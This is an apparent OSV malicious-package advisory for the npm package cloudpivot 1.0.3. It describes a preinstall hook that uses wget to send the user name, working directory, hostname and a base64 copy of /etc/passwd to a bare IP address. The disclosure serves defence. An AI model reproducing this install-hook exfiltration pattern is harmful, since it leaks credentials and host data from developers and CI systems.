cloudpivot @1.0.3
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4529
Ecosystem
npm
Summary
On npm install , the package.json preinstall hook runs wget against http://194.120.24.50:7374 with query parameters carrying $(whoami) , $(pwd) , $(hostname) , and a base64-encoded copy of /etc/passwd . The package ships no functional code — main: index.js is declared but no index.js is present — so the only effect of installing the package is the exfiltration probe firing automatically. The destination is a bare IP over plain HTTP, with no relation to any declared publisher, and the package description itself references Burp Collaborator abuse. Any developer or CI system that runs npm install cloudpivot leaks host identifiers and the local user database to the operator of 194.120.24.50.
Source: amazon-inspector (4bd95ac92732da86e3ec63771e124da83ea8d98e1dd2f6636ab3d8dde76ab34c)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.